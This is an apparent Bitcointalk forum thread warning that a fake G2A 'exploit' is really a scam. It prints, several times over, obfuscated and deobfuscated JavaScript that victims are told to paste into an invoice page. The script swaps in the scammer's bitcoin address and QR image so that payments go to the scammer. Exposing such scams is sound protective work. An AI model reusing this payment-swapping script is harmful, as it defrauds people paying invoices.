I've seen this scam many times before in other forums too and I know it's not targeting G2A users only. You might even find people selling "Dice bots" that works the same way I just described above so be careful.
Thanks for sharing all in details by creating a separate topic about this. I hope it will work as a warning for bitcointalk forum users and they will be careful after reading the entire thread. 
Topic: The "exploit" scam. (Read 144 times)
Very intelligent way to fool people. As they say, you can't con an honest man as an honest man isn't looking for exploits.
Archive: https://archive.is/0csDL
As you can see, the user is claiming that there is an issue with G2A's bitcoin payment processor which allows users to get things for free.
This is the "exploit" code that you're supposed to run once you're in the invoice's page:
After deobfuscating the code, I got the following:
Which contains the scammer's bitcoin address (3LKZsYuy2YxvCsTQJ4Gb3dGKQR9sxsM2Yw) and its QR code (hosted in imgur).
I've seen this scam many times before in other forums too and I know it's not targeting G2A users only. You might even find people selling "Dice bots" that works the same way I just described above so be careful.
As you can see, the user is claiming that there is an issue with G2A's bitcoin payment processor which allows users to get things for free.
This is the "exploit" code that you're supposed to run once you're in the invoice's page:
Code:
var _0x128a=
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x68\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C
\x6C\x79\x20\x62\x65\x65\x6E\x20\x45\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20
\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","
getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\
x3A\x20\x33\x4C\x4B\x5A\x73\x59\x75\x79\x32\x59\x78\x76\x43\x73\x54\x51\x4A\x34\
x47\x62\x33\x64\x47\x4B\x51\x52\x39\x73\x78\x73\x4D\x32\x59\x77","src","code","\x68\
x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x73\x74\
x76\x48\x6B\x51\x6F\x2E\x70\x6E\x67","length"];alert(_0x128a[0]);var _0x4892da=setInterval(function()
{
var _0xf782x2=document[_0x128a[2]](_0x128a[1]); _0xf782x2[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0]
[_0x128a[5]]= _0x128a[7];var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
if(_0xf782x3[_0x128a[8]]> 0)
{
clearInterval(_0x4892da)
}
}
,10)
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x68\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C
\x6C\x79\x20\x62\x65\x65\x6E\x20\x45\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20
\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","
getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\
x3A\x20\x33\x4C\x4B\x5A\x73\x59\x75\x79\x32\x59\x78\x76\x43\x73\x54\x51\x4A\x34\
x47\x62\x33\x64\x47\x4B\x51\x52\x39\x73\x78\x73\x4D\x32\x59\x77","src","code","\x68\
x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x73\x74\
x76\x48\x6B\x51\x6F\x2E\x70\x6E\x67","length"];alert(_0x128a[0]);var _0x4892da=setInterval(function()
{
var _0xf782x2=document[_0x128a[2]](_0x128a[1]); _0xf782x2[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0]
[_0x128a[5]]= _0x128a[7];var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
if(_0xf782x3[_0x128a[8]]> 0)
{
clearInterval(_0x4892da)
}
}
,10)
After deobfuscating the code, I got the following:
Code:
'use strict';
/** @type {!Array} */
var _0x128a = ["Exploit has successfully been Enabled! Press OK to continue.", "row", "getElementsByClassName", "innerHTML",
"BTC address: 3LKZsYuy2YxvCsTQJ4Gb3dGKQR9sxsM2Yw", "src", "code", "https://i.imgur.com/stvHkQo.png", "length"];
alert(_0x128a[0]);
/** @type {number} */
var _0x4892da = setInterval(function() {
var _0xf782x2 = document[_0x128a[2]](_0x128a[1]);
_0xf782x2[1][_0x128a[3]] = _0x128a[4];
document[_0x128a[2]](_0x128a[6])[0][_0x128a[5]] = _0x128a[7];
var _0xf782x3 = document[_0x128a[2]](_0x128a[6]);
if (_0xf782x3[_0x128a[8]] > 0) {
clearInterval(_0x4892da);
}
}, 10);
/** @type {!Array} */
var _0x128a = ["Exploit has successfully been Enabled! Press OK to continue.", "row", "getElementsByClassName", "innerHTML",
"BTC address: 3LKZsYuy2YxvCsTQJ4Gb3dGKQR9sxsM2Yw", "src", "code", "https://i.imgur.com/stvHkQo.png", "length"];
alert(_0x128a[0]);
/** @type {number} */
var _0x4892da = setInterval(function() {
var _0xf782x2 = document[_0x128a[2]](_0x128a[1]);
_0xf782x2[1][_0x128a[3]] = _0x128a[4];
document[_0x128a[2]](_0x128a[6])[0][_0x128a[5]] = _0x128a[7];
var _0xf782x3 = document[_0x128a[2]](_0x128a[6]);
if (_0xf782x3[_0x128a[8]] > 0) {
clearInterval(_0x4892da);
}
}, 10);
Which contains the scammer's bitcoin address (3LKZsYuy2YxvCsTQJ4Gb3dGKQR9sxsM2Yw) and its QR code (hosted in imgur).
I've seen this scam many times before in other forums too and I know it's not targeting G2A users only. You might even find people selling "Dice bots" that works the same way I just described above so be careful.
Jump to: